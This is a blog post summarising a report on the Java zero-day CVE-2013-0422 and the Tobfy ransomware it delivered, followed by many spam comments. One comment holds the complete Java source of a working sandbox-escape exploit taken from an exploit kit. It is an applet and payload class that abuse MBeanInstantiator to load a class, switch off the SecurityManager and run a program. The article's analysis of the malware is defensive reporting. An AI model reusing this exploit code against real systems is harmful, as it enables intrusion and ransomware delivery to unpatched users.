New Zero-Day Java Exploit

After Julia Wolf, Darien Kindlund, and James Bennett from FireEye, in their post: Happy New Year from new Java Zero-day, observed that a Java security bypass zero-day vulnerability (CVE-2013-0422) has been actively exploited in the wild starting Jan. 2. They have been able to reproduce the attack in-house with the latest Java 7 update (Java 7 update 10) on Windows.

Some initial landing pages are actually hosted on a popular file-sharing website. Eventually the landing pages redirect to several different domains hosting exploits and malware.

ScreenShot079
The malware will download an executable file from a remote server and execute it by exploiting the vulnerability. Though the malware is designed for Windows only, the vulnerability can also be exploited across different browsers and OS platforms.

ScreenShot080

The malware payload is ransomware, commonly known as Tobfy. It retrieves a template from the Web, in this case:
hxxp://<random>.cristmastea.info/get.php — and creates a full screen window demanding payment using some kind of social engineering scheme to scare the victim. Additionally, it disables Windows Safe Mode by deleting values under

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot, and it terminates processes like “taskmgr.exe,” “msconfig.exe,” “regedit.exe,” and “cmd.exe” in order to deter the victim from trying to find or disable the malware. Strings such as:
\\xneo\\lock\\Release\\lock.pdb and “Conteneur ActiveX” were found in memory and helped make identification easier.

One more noteworthy finding is that the URLs used to download the template and make callbacks are stored XOR encoded and must be decoded before use. However, it appears the author forgot to call the decode function in the callback thread. This means that the malware is unable to communicate with the attacker. The malware is supposed to make an HTTP request for:
hxxp://<random>.my-files-download.ru/status.php, but instead requests the invalid URL
hxxp://<random>.my-files-download.ru/.ru`utr/qiq. What makes this error even worse for victims is that this callback thread determines whether the victim has paid the fee and is responsible for removing the ransomware from the system. It seems even paying up will do no good in this case!

ScreenShot081
ScreenShot082

ScreenShot083

 

Advertisements

74 Responses to “New Zero-Day Java Exploit”

  1. Aw, this was a very nice post. Finding the time and actual effort to generate a superb
    article… but what can I say… I hesitate a whole lot and don’t seem to get anything done.

  2. I just could not depart your site prior to suggesting
    that I extremely loved the usual info an individual provide for your guests?
    Is gonna be again continuously in order to investigate cross-check new
    posts

  3. It is in point of fact a nice and useful piece of info.
    I’m happy that you shared this useful information with us. Please stay us informed like this. Thank you for sharing.

  4. Hello there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog
    and look forward to new updates.

  5. Your style is so unique compared to other people I have read
    stuff from. Thanks for posting when you’ve got the opportunity, Guess I’ll just book mark this page.

  6. It’s actually a nice and useful piece of information. I am glad that you just shared this helpful information with us. Please keep us up to date like this. Thank you for sharing.

  7. Woah this weblog is wonderful i really like studying your articles. Stay up the great work! You already know, a lot of people are looking round for this info, you could help them greatly.

  8. What’s up Dear, are you in fact visiting this web site regularly, if so then you will definitely get pleasant knowledge.

  9. Wow, this piece of writing is nice, my younger sister is analyzing these kinds of things, thus I am going to convey her.

  10. For the reason that the admin of this web site is working, no
    question very shortly it will be well-known, due to its quality contents.

  11. Hello, I enjoy reading all of your article.
    I wanted to write a little comment to support you.

  12. Aw, this was an exceptionally good post. Finding the time and actual effort to produce a top notch article… but what can I say… I procrastinate a whole lot and never seem to get nearly anything done.

  13. I really like your blog.. very nice colors & theme.
    Did you create this website yourself or did you hire someone to do it for you?
    Plz respond as I’m looking to create my own blog and would like to find out where u got this from. many thanks

  14. I have been exploring for a bit for any high-quality articles
    or blog posts in this sort of house . Exploring in Yahoo I
    at last stumbled upon this site. Studying this info So i am happy to show that I have an incredibly excellent uncanny feeling
    I found out exactly what I needed. I most without a doubt will make certain to do
    not omit this website and give it a glance regularly.

  15. Admiring the hard work you put into your blog and detailed information you provide.
    It’s awesome to come across a blog every once in a while that isn’t the same
    out of date rehashed material. Great read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.

  16. Your method of describing all in this piece of writing is in fact fastidious, all can simply understand it, Thanks a lot.

  17. It’s not my first time to pay a visit this web page, i am visiting this site dailly and obtain good information from here all the time.

  18. I am not sure the place you’re getting your information, however great topic. I needs to spend a while finding out much more or working out more. Thanks for great info I used to be on the lookout for this info for my mission.

  19. Hey There. I found your blog using msn. This is
    a very well written article. I’ll make sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.

  20. Nice post. I was checking constantly this blog and I am impressed!
    Very useful information particularly the last part 🙂 I care for such info much.
    I was seeking this certain information for a long time.
    Thank you and best of luck.

  21. I like it when folks get together and share thoughts.
    Great site, keep it up!

  22. Hi there, its pleasant piece of writing about media print, we all be familiar with media is
    a impressive source of information.

  23. You really make it seem so easy together with your presentation however
    I in finding this topic to be actually something which
    I feel I would never understand. It kind of feels too complicated and extremely large for
    me. I’m taking a look forward in your next publish, I’ll attempt to get the grasp of it!

  24. Woah! I’m really loving the template/theme of this site. It’s simple, yet effective.

    A lot of times it’s challenging to get that “perfect balance” between superb usability and visual appeal. I must say that you’ve done a
    amazing job with this. In addition, the blog loads super fast
    for me on Chrome. Excellent Blog!

  25. After looking over a few of the articles on your web site, I seriously like
    your technique of blogging. I book-marked it to my bookmark
    website list and will be checking back soon. Please check out my web site as well and tell me what you think.

  26. Thnx for writing this information on your website.

  27. I don’t know whether it’s just me or if perhaps everybody else encountering problems with your blog.

    It seems like some of the written text in your posts are running
    off the screen. Can someone else please comment and let me
    know if this is happening to them too? This may be a issue with my browser
    because I’ve had this happen before. Kudos

  28. Hey there! This is my first comment here so I just wanted to give a quick shout out
    and tell you I genuinely enjoy reading your posts. Can
    you suggest any other blogs/websites/forums that cover the same subjects?
    Thank you!

  29. Hmm it appears like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I submitted and say, I’m
    thoroughly enjoying your blog. I too am an aspiring blog blogger but I’m still new to everything. Do you have any tips and hints for first-time blog writers? I’d really
    appreciate it.

  30. I needed to thank you for this excellent read!! I definitely loved every bit of it.
    I have got you book-marked to check out new stuff you post…

  31. This design is steller! You definitely know how to keep a reader entertained.
    Between your wit and your videos, I was almost moved to start
    my own blog (well, almost…HaHa!) Wonderful job.
    I really enjoyed what you had to say, and more than that, how you presented it.
    Too cool!

  32. Thank you for the auspicious writeup. It in fact was a leisure account it.
    Look complicated to more brought agreeable from you!

    However, how could we keep up a correspondence?

  33. Incredible points. Outstanding arguments. Keep up the
    good work.

  34. You need to be a part of a contest for one of the greatest blogs online.

    I most certainly will recommend this blog!

  35. Do you mind if I quote a couple of your articles as long as I provide credit and sources back
    to your weblog? My blog site is in the very same
    niche as yours and my users would certainly benefit from a lot of the information you present here.

    Please let me know if this alright with you. Cheers!

  36. Does your website have a contact page? I’m having a tough time locating it but, I’d like to shoot
    you an email. I’ve got some recommendations for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it expand over time.

  37. I love it when people get together and share ideas. Great
    site, keep it up!

  38. I am sure this article has touched all the internet people,
    its really really good piece of writing on building up new website.

  39. Magnificent beat ! I wish to apprentice while you amend your web site, how
    can i subscribe for a blog website? The account helped me
    a acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear concept

  40. Excellent items from you, man. I’ve take into accout your stuff previous to and you’re just extremely
    magnificent. I actually like what you have bought here, certainly like what you’re saying and the way wherein you assert it. You are making it entertaining and you still take care of to stay it smart. I can not wait to read far more from you. This is really a wonderful web site.

  41. Hello there! I know this is kinda off topic but I was wondering
    which blog platform are you using for this site? I’m getting sick and tired of WordPress because I’ve had problems with hackers and I’m looking at alternatives for another platform. I would be fantastic if you could point me in the direction of a good platform.

  42. We stumbled over here from a different website and thought I might
    as well check things out. I like what I see so i am just following you.
    Look forward to going over your web page for a second time.

  43. I’m not that much of a internet reader to be honest but your blogs really nice, keep it up!

    I’ll go ahead and bookmark your site to come back later on. All the best

  44. Definitely consider that which you said. Your favorite justification seemed to be on the
    net the easiest thing to take into accout of. I say to you,
    I definitely get annoyed even as folks think about
    issues that they just don’t know about. You managed to hit the nail upon the top and defined out the entire thing without having side-effects , people can take a signal. Will probably be back to get more. Thanks

  45. Hi, Neat post. There’s an issue along with your web site in web explorer, may test this? IE nonetheless is the market chief and a huge part of other people will omit your fantastic writing because of this problem.

  46. Do you mind if I quote a few of your posts as long as I provide credit and sources back to your webpage?

    My website is in the very same area of interest as
    yours and my visitors would definitely benefit from a lot of
    the information you present here. Please let me know if this
    alright with you. Regards!

  47. I couldn’t resist commenting. Perfectly written!

  48. Hello! I could have sworn I’ve been to this website before but right after browsing by means of some with the post I realized it is new to me. Nonetheless, I’m surely happy I found it and I’ll be book-marking and checking back often!

  49. This is my first time pay a visit at here and i am truly happy to
    read all at alone place.

  50. You are so interesting! I don’t think I’ve read anything like
    that before. So good to find another person with original
    thoughts on this topic. Seriously.. thank you for starting this
    up. This site is one thing that is required on the internet, someone with a little originality!

  51. Quite informative post. Your current Site style is awesome as nicely!

  52. /*
    * From Paunch with love (Java 1.7.0_11 Exploit)
    *
    * Deobfuscated from Cool EK by SecurityObscurity
    *
    * https://twitter.com/SecObscurity
    */
    import java.applet.Applet;
    import com.sun.jmx.mbeanserver.Introspector;
    import com.sun.jmx.mbeanserver.JmxMBeanServer;
    import com.sun.jmx.mbeanserver.MBeanInstantiator;
    import java.lang.invoke.MethodHandle;
    import java.lang.invoke.MethodHandles.Lookup;
    import java.lang.invoke.MethodType;
    import java.lang.reflect.InvocationTargetException;
    import java.lang.reflect.Method;
    import javax.management.ReflectionException;
    import java.io.*;

    public class PaunchGift extends Applet
    {

    public void init()
    {

    try
    {
    int length;
    byte[] buffer = new byte[5000];
    ByteArrayOutputStream os = new ByteArrayOutputStream();

    // read in the class file from the jar
    InputStream is = getClass().getResourceAsStream(“Payload.class”);

    // and write it out to the byte array stream
    while( ( length = is.read( buffer ) ) > 0 )
    os.write( buffer, 0, length );

    // convert it to a simple byte array
    buffer = os.toByteArray();

    Class class1 = gimmeClass(“sun.org.mozilla.javascript.internal.Context”);

    Method method = getMethod(class1, “enter”, true);
    Object obj = method.invoke(null, new Object[0]);
    Method method1 = getMethod(class1, “createClassLoader”, false);
    Object obj1 = method1.invoke(obj, new Object[1]);

    Class class2 = gimmeClass(“sun.org.mozilla.javascript.internal.GeneratedClassLoader”);
    Method method2 = getMethod(class2, “defineClass”, false);

    Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
    my_class.newInstance();
    Method m_outSandbox = my_class.getMethod(“outSandbox”, new Class[0]);
    m_outSandbox.invoke(null, new Object[] {});

    }
    catch (Throwable localThrowable){}

    }

    private Method getMethod(Class class1, String s, boolean flag)
    {
    try {
    Method[] amethod = (Method[])Introspector.elementFromComplex(class1, “declaredMethods”);
    Method[] amethod1 = amethod;

    for (int i = 0; i < amethod1.length; i++) {
    Method method = amethod1[i];
    String s1 = method.getName();
    Class[] aclass = method.getParameterTypes();
    if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
    }
    } catch (Exception localException) { }

    return null;
    }

    private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
    {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
    }

    }

    ###############################################
    import java.lang.reflect.Method;
    import java.security.AccessController;
    import java.security.PrivilegedExceptionAction;

    public class Payload implements PrivilegedExceptionAction
    {

    public Payload()
    {
    try
    {
    AccessController.doPrivileged(this);
    }
    catch(Exception exception) { }
    }

    public Object run() throws Exception
    {
    Class cl = System.class;
    Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
    m.invoke(null, new Object[1]);
    return null;
    }

    public static void outSandbox() throws Exception
    {
    Runtime.getRuntime().exec("calc.exe");
    }
    }

  53. Wonderful blog! I found it while browsing on Yahoo News. Do you have any suggestions on how
    to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Appreciate it

  54. Just desire to say your article is as astounding. The clearness in your post is just great and i could
    assume you’re an expert on this subject. Fine with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please keep up the enjoyable work.

  55. Wow that was odd. I just wrote an really long comment but after I clicked
    submit my comment didn’t appear. Grrrr… well I’m not writing all that over again.
    Anyways, just wanted to say fantastic blog!

  56. Good way of describing, and nice paragraph to take facts about my presentation subject matter, which i am going to present in institution
    of higher education.

  57. I delight in, lead to I found exactly what I was looking for.
    You’ve ended my 4 day lengthy hunt! God Bless you man. Have a great day. Bye

  58. There’s definately a great deal to learn about this issue. I love all of the points you have made.

  59. Thanks for the auspicious writeup. It if truth be told was a enjoyment
    account it. Glance advanced to far brought agreeable from you!
    By the way, how can we communicate?

  60. For most up-to-date news you have to go to see world-wide-web and on the web I found
    this web page as a most excellent web page for newest updates.

  61. Hey There. I found your weblog the usage of msn.
    That is a very smartly written article. I will be sure to bookmark it and return to learn more of your helpful info.

    Thank you for the post. I’ll certainly return.

  62. It’s remarkable in support of me to have a web page, which is good designed for my know-how. thanks admin

  63. I simply want to tell you that I am newbie to blogging and site-building and absolutely liked you’re web blog. Likely I’m going to bookmark your blog post . You absolutely have good article content. Many thanks for sharing with us your website.

  64. Yes! Finally someone writes about acme brick.

  65. I think this is among the most vital info for me.

    And i am glad reading your article. But should remark on
    few general things, The web site style is wonderful, the articles is really great
    : D. Good job, cheers

  66. Appreciate this post. Will try it out.

  67. Howdy! I simply wish to give you a big thumbs up for your
    excellent information you’ve got here on this post. I will be returning to your site for more soon.

  68. this might seem kinda creepy but i really like the way you speak. anyways, great video! i look forward to more of these videos 🙂

  69. Great video, Fun and succinctly explained.. Will use it an introduction when I am giving talks to genealogists and historians on blogging

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: